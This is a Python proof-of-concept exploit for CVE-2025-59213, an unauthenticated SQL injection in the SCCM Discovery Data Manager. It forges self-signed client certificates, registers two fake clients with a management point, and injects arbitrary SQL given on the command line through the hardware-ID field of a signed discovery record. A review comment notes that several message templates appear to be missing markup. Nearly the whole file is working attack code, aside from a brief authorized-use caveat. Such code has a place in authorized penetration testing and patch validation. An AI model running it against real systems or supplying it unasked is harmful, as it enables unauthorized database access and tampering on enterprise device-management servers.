#!/usr/bin/env python3
"""Proof-of-concept client for CVE-2025-59213 (SCCM Discovery Data Manager).

The script registers two clients against a management point and then sends
a discovery data record (DDR) whose hardware-ID field carries the SQL text
given on the command line.

Use only against systems you are explicitly authorized to test.
"""
import argparse
import datetime
import random
import re
import uuid
import zlib
from time import sleep
from urllib.parse import urlparse

import requests
import urllib3
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
from cryptography.x509 import ObjectIdentifier
from cryptography.x509.oid import NameOID

# Requests are sent with verify=False; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def time1():
    """Return the current UTC time as ``YYYY-MM-DDTHH:MM:SSZ``."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return now.strftime("%Y-%m-%dT%H:%M:%SZ")


def time2():
    """Return the current UTC time as ``YYYYMMDDHHMMSS.ffffff+000``."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return now.strftime("%Y%m%d%H%M%S.%f") + "+000"


def time3():
    """Return the current UTC time as ``DD/MM/YYYY HH:MM:SS``."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return now.strftime("%d/%m/%Y %H:%M:%S")


# from https://github.com/xpn/sccmwtf
class CryptoTools:
    """Stateless helpers around RSA keys and self-signed certificates."""

    @staticmethod
    def createCertificateForKey(key, cname):
        """Return a self-signed certificate for *key* with common name *cname*.

        The certificate is valid from two days in the past to 365 days in the
        future and is signed with SHA-256.
        """
        subject = issuer = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, cname),
        ])
        now = datetime.datetime.now(datetime.timezone.utc)
        key_usage = x509.KeyUsage(
            digital_signature=True,
            key_encipherment=False,
            key_cert_sign=False,
            key_agreement=False,
            content_commitment=False,
            data_encipherment=True,
            crl_sign=False,
            encipher_only=False,
            decipher_only=False,
        )
        # SMS Signing Certificate (Self-Signed)
        extended_key_usage = x509.ExtendedKeyUsage([
            ObjectIdentifier("1.3.6.1.4.1.311.101.2"),
            ObjectIdentifier("1.3.6.1.4.1.311.101"),
        ])
        builder = (
            x509.CertificateBuilder()
            .subject_name(subject)
            .issuer_name(issuer)
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(days=2))
            .not_valid_after(now + datetime.timedelta(days=365))
            .add_extension(key_usage, critical=False)
            .add_extension(extended_key_usage, critical=False)
        )
        return builder.sign(key, hashes.SHA256())

    @staticmethod
    def generateRSAKey():
        """Return a new 2048-bit RSA private key (public exponent 65537)."""
        return rsa.generate_private_key(public_exponent=65537, key_size=2048)

    @staticmethod
    def buildMSPublicKeyBlob(key):
        """Return the public key of *key* as an upper-case hex key blob.

        The result is a fixed 20-byte header followed by the modulus in
        little-endian byte order.
        """
        # Built from spec: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/ade9efde-3ec8-4e47-9ae9-34b64d8081bb
        blobHeader = b"\x06\x02\x00\x00\x00\xA4\x00\x00\x52\x53\x41\x31\x00\x08\x00\x00\x01\x00\x01\x00"
        modulus = key.public_key().public_numbers().n
        blob = blobHeader + modulus.to_bytes(int(key.key_size / 8), byteorder="little")
        return blob.hex().upper()

    @staticmethod
    def sign(key, data):
        """Sign *data* (PKCS#1 v1.5, SHA-256) and return the reversed bytes.

        Signs data using SHA256 and then reverses the byte order as per SCCM.
        """
        signature = key.sign(data, PKCS1v15(), hashes.SHA256())
        return bytes(reversed(signature))

    @staticmethod
    def decrypt(key, data):
        """Decrypt *data* with *key* (PKCS#1 v1.5) and print the plaintext."""
        print(key.decrypt(data, PKCS1v15()))

    @staticmethod
    def load_privatekey_from_pem(pem):
        """Load an unencrypted private key from PEM-encoded bytes."""
        return serialization.load_pem_private_key(pem, password=None)

    @staticmethod
    def dump_privatekey_to_pem(key):
        """Serialize *key* as unencrypted PKCS#8 PEM bytes."""
        return key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption(),
        )

    @staticmethod
    def dump_cert_to_pem(cert):
        """Serialize *cert* as PEM bytes."""
        return cert.public_bytes(encoding=serialization.Encoding.PEM)


class SCCM:
    """Builds, signs and posts CCM messages to a management point."""

    # NOTE(review): several templates below are formatted with keyword
    # arguments they never reference (LENGTH, OFFSET, NAME, SMBIOSID, ...)
    # and tpl_attachment_header is empty. The surrounding markup appears to
    # be missing from this copy of the file - confirm against the upstream
    # source before relying on them. They are reproduced here unchanged.
    tpl_multipart = b"--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n%b\r\n--aAbBcCdDv1234567890VxXyYzZ--"
    tpl_ccm_header = """ {ID} {SMSID} {SOURCE_HOST} direct:dummy:dummy {TARGET_HOST} {TARGET_ENDPOINT} mp:{TARGET_ENDPOINT} 3 direct:dummy:dummy 86400 http {REPLY_MODE} {TIME} {ATTACHMENT} {CLIENT_AUTH} direct:{SOURCE_HOST}:ClientRegistration"""
    tpl_hook2_clientauth = """{SOURCE_HOST}1.2.840.113549.1.1.11NonSSL{PayloadSignature}"""
    tpl_attachment_header = """"""

    # MP_ClientRegistration
    tpl_client_registration_request = """{DATA}{PAYLOAD_SIGNATURE}"""
    tpl_client_registration_data = """{encryption}{signature}"""

    # MP_DdrEndpoint
    tpl_ddr_report = """ 1 1 {SMSID} {CLIENT_VERSION} {SOURCE_HOST} 437 1033 Inventory Data Full {TIME2} 9.0 1.1 {{00000000-0000-0000-0000-000000000003}} Discovery {TIME2} {TIME3} {OLDSMSID} {HID} """

    def __init__(self, target, key, cert, client_sign_key, sqlcmd, altAuth=False, autoClean=True, verbose=False):
        """Prepare the signing material and the request parameters.

        Args:
            target: Base URL of the management point.
            key: Path to the private key file used for mTLS, or None.
            cert: Path to the certificate file used for mTLS, or None.
            client_sign_key: Path to a PEM signing key. When None, a new key
                is generated and written to ``/tmp/sccm_poc.key``.
            sqlcmd: SQL text appended to the hardware-ID field.
            altAuth: Use the ``ccm_system_altauth`` endpoint when true.
            autoClean: Prepend a statement that deletes the rows tagged with
                this run's client-version marker.
            verbose: Print request bodies and HTTP responses.
        """
        self._target = target
        endpoint = "ccm_system_altauth" if altAuth else "ccm_system"
        self._target_url = f"{target}/{endpoint}/request"
        self._pkey = key
        self._cert = cert

        # gen and persist cert if one isn't provided via cmdline
        if client_sign_key is None:
            self.signkey = CryptoTools.generateRSAKey()
            keyfname = "/tmp/sccm_poc.key"
            print(f"[+] Generated new signing key, saved to {keyfname}")
            with open(keyfname, "wb") as f:
                f.write(CryptoTools.dump_privatekey_to_pem(self.signkey))
        else:
            # Context manager so the key file handle is closed promptly.
            with open(client_sign_key, "rb") as f:
                self.signkey = CryptoTools.load_privatekey_from_pem(f.read())

        self._renew_signing_cert()

        self.SMSID = ""
        self.OLDSMSID = ""
        # Set by register_client(); initialised so the attribute always exists.
        self.SOURCE_HOST = ""
        self.CLIENT_VERSION = random.randint(1, 999)  # marker for cleaning
        # clean registered client
        self.auto_clean_cmd = f"delete from System_DISC where Client_Version0='{self.CLIENT_VERSION}';" if autoClean else ''
        # injection vector
        self.HID = f"{self.CLIENT_VERSION}';{self.auto_clean_cmd}{sqlcmd}-- "
        self.TARGET_HOST = urlparse(self._target_url).hostname
        self.SMBIOS_GUID0 = str(uuid.uuid4()).upper()
        self.verbose = verbose

    def _renew_signing_cert(self):
        """Create a fresh self-signed certificate for the signing key."""
        self.signcert = CryptoTools.createCertificateForKey(self.signkey, u"ConfigMgr Client")
        self.signcert_hex = self.signcert.public_bytes(serialization.Encoding.DER).hex().upper()

    def _debug(self, m):
        """Print *m* when verbose output is enabled."""
        if self.verbose:
            print(m)

    def __ccm_post(self, data):
        """POST *data* with the CCM_POST verb and return the raw response body."""
        headers = {
            "User-Agent": "ConfigMgr Messaging HTTP Sender",
            "Content-Type": 'multipart/mixed; boundary="aAbBcCdDv1234567890VxXyYzZ"',
        }
        r = requests.request(
            "CCM_POST",
            self._target_url,
            headers=headers,
            data=data,
            verify=False,
            cert=(self._cert, self._pkey),
        )
        self._debug(f">>>> HTTP Response : {r.status_code} <<<<<\n{r.text}\n")
        return r.content

    def __ccm_messaging_request(self, endpoint, body, attachment=b"", clientSMSID="", clientname="", clientauth=False, isAsync=False):
        """Wrap *body* and *attachment* in a CCM message and post it.

        Args:
            endpoint: Name of the target endpoint.
            body: Message body bytes.
            attachment: Bytes appended after the body.
            clientSMSID: SMSID placed in the message header.
            clientname: Source host name placed in the message header.
            clientauth: Add a client-auth section signed over the compressed body.
            isAsync: Request "Async" reply mode instead of "Sync".

        Returns:
            The raw HTTP response body.
        """
        MSGID = f'{{{str(uuid.uuid4()).upper()}}}'
        print(f"[+] CcmMessage : ID={MSGID}")

        final_body = body + attachment + b"\x00\x00"
        compressedbody = zlib.compress(final_body)

        clientsig = ""
        if clientauth:
            print("[+] CcmMessage : adding clientauth")
            clientsig = self.tpl_hook2_clientauth.format(SOURCE_HOST=clientname, PayloadSignature=self.sign(compressedbody))

        attachment_header = ""
        if attachment:
            print("[+] CcmMessage : adding attachment")
            attachment_header = self.tpl_attachment_header.format(LENGTH=len(attachment), OFFSET=len(body), NAME="Attachment1")

        ccm_header = self.tpl_ccm_header.format(
            LENGTH=len(final_body),
            ID=MSGID,
            TARGET_HOST=self.TARGET_HOST,
            TARGET_ENDPOINT=endpoint,
            REPLY_MODE="Async" if isAsync else "Sync",
            TIME=time1(),
            SMSID=clientSMSID,
            SOURCE_HOST=clientname,
            ATTACHMENT=attachment_header,
            CLIENT_AUTH=clientsig,
        )
        multipart_body = self.tpl_multipart % (ccm_header.encode("utf-16"), compressedbody)

        # Callers encode body and attachment as UTF-16-LE. The message is
        # built even when verbose is off, so the decode must never raise.
        self._debug(f">>>> CcmMessaging Body <<<<<\n{final_body.decode('utf-16-le', errors='replace')}\n")
        return self.__ccm_post(multipart_body)

    def sign(self, data):
        """Sign *data* with the signing key; return upper-case hex."""
        return CryptoTools.sign(self.signkey, data).hex().upper()

    def register_client(self, clientname):
        """Send a registration request for *clientname*.

        Returns:
            The SMSID found in the reply, or None when the reply cannot be
            parsed or carries no SMSID.
        """
        self.SOURCE_HOST = clientname
        reg_data = self.tpl_client_registration_data.format(
            SMSID="",
            TIME=time1(),
            CLIENT_NAME=clientname,
            encryption=self.signcert_hex,
            signature=self.signcert_hex,
            SMBIOSID=self.SMBIOS_GUID0,
            CLIENT_VERSION=self.CLIENT_VERSION,
        )
        sig = self.sign(reg_data.encode('utf-16-le'))
        client_registration_request = self.tpl_client_registration_request.format(DATA=reg_data, PAYLOAD_SIGNATURE=sig)
        rsp = self.__ccm_messaging_request(
            'MP_ClientRegistration',
            body=client_registration_request.encode('utf-16-le'),
            attachment=b"",
            clientSMSID=self.SMSID,
            clientname=self.SOURCE_HOST,
            clientauth=False,
        )

        try:
            # Third multipart section, fourth CRLF-separated field: the
            # zlib-compressed reply.
            compressed = rsp.split(b'--aAbBcCdDv1234567890VxXyYzZ')[2].split(b'\r\n')[3]
            deflatedData = zlib.decompress(compressed).decode('utf-16-le')
        except (IndexError, zlib.error, UnicodeDecodeError):
            print("[!] Failed to register client")
            return None

        # re.search returns None on no match; the previous findall() check
        # against None could never fail and crashed on an empty list.
        match = re.search(r'SMSID="([^"]+)"', deflatedData)
        if match is None:
            print("[!] Failed to register client")
            return None

        SMSID = match.group(1)
        print(f"[+] Got SMSID = {SMSID} for new client {clientname}")
        sleep(1)
        return SMSID

    def send_ddr_report(self, clientname):
        """Send the DDR report for the client registered last.

        *clientname* is accepted for symmetry with register_client() but is
        not read; the host name comes from ``self.SOURCE_HOST``.
        """
        report_attachment = self.tpl_ddr_report.format(
            SMSID=self.SMSID,
            OLDSMSID=self.OLDSMSID,
            HID=self.HID,
            SOURCE_HOST=self.SOURCE_HOST,
            CLIENT_VERSION=self.CLIENT_VERSION,
            TIME2=time2(),
            TIME3=time3(),
        )
        print(f'[+] Sending DDR report: SMSID={self.SMSID} OLDSMSID={self.OLDSMSID}')
        rsp = self.__ccm_messaging_request(
            'MP_DdrEndpoint',
            body=b"",
            attachment=report_attachment.encode('utf-16-le'),
            clientSMSID=self.SMSID,
            clientname=self.SOURCE_HOST,
            clientauth=True,
            isAsync=True,
        )
        if 'NoReply'.encode('utf-16-le') in rsp:
            print('[+] DDR report sent successfully')

    def exploit(self, clientname, delay=10):
        """Register *clientname* twice, wait *delay* seconds, send the DDR.

        Raises:
            ValueError: If *delay* is below 2 seconds.
            RuntimeError: If a registration fails or both registrations
                return the same SMSID.
        """
        # Explicit checks instead of assert, which is stripped under -O.
        if delay < 2:
            raise ValueError("delay must be at least 2 seconds")

        self.SMSID = self.register_client(clientname)
        if self.SMSID is None:
            raise RuntimeError("first client registration failed")

        # create new cert to force a new SMSID (new versions)
        self._renew_signing_cert()
        self.OLDSMSID = self.register_client(clientname)
        if self.OLDSMSID is None:
            raise RuntimeError("second client registration failed")
        if self.SMSID == self.OLDSMSID:
            raise RuntimeError("both registrations returned the same SMSID")

        # mandatory
        sleep(delay)
        self.send_ddr_report(clientname)


def main():
    """Parse the command line and run the proof of concept."""
    parser = argparse.ArgumentParser(description="CVE-2025-59213 - Discovery Data Manager (DDM) Unauthenticated SQL Injection")
    parser.add_argument("-t", "--target", action="store", required=True, default=None, help="Target (http://sccm-mp.local/)")
    parser.add_argument("-sk", "--sigkey", action="store", required=False, default=None, help="SMS signature key (automatically generated if omitted)")
    parser.add_argument("-k", "--key", action="store", required=False, default=None, help="Private key file for mTLS")
    parser.add_argument("-c", "--cert", action="store", required=False, default=None, help="Certificate file for mTLS")
    parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="Verbose output, print requests")
    parser.add_argument("-cn", "--client-name", action="store", required=True, default=None, help="Name of the client that will be created in SCCM")
    parser.add_argument("-rs", "--registration-sleep", action="store", type=int, required=False, default=10, help="The amount of time, in seconds, to wait after registering a new device (10 seconds by default, minimum 2)")
    parser.add_argument("-a", "--altauth", action="store_true", required=False, default=False, help="Use the MP's alternate authentication endpoint")
    parser.add_argument("-sql", action="store", required=True, default=None, help="Query to execute through the SQL injection")
    parser.add_argument("-nc", "--no-clean", action="store_true", required=False, default=False, help="Do not automatically clean the registered devices")

    options = parser.parse_args()
    client = SCCM(
        options.target,
        options.key,
        options.cert,
        options.sigkey,
        options.sql,
        altAuth=options.altauth,
        autoClean=(not options.no_clean),
        verbose=options.verbose,
    )
    client.exploit(options.client_name, options.registration_sleep)


if __name__ == "__main__":
    main()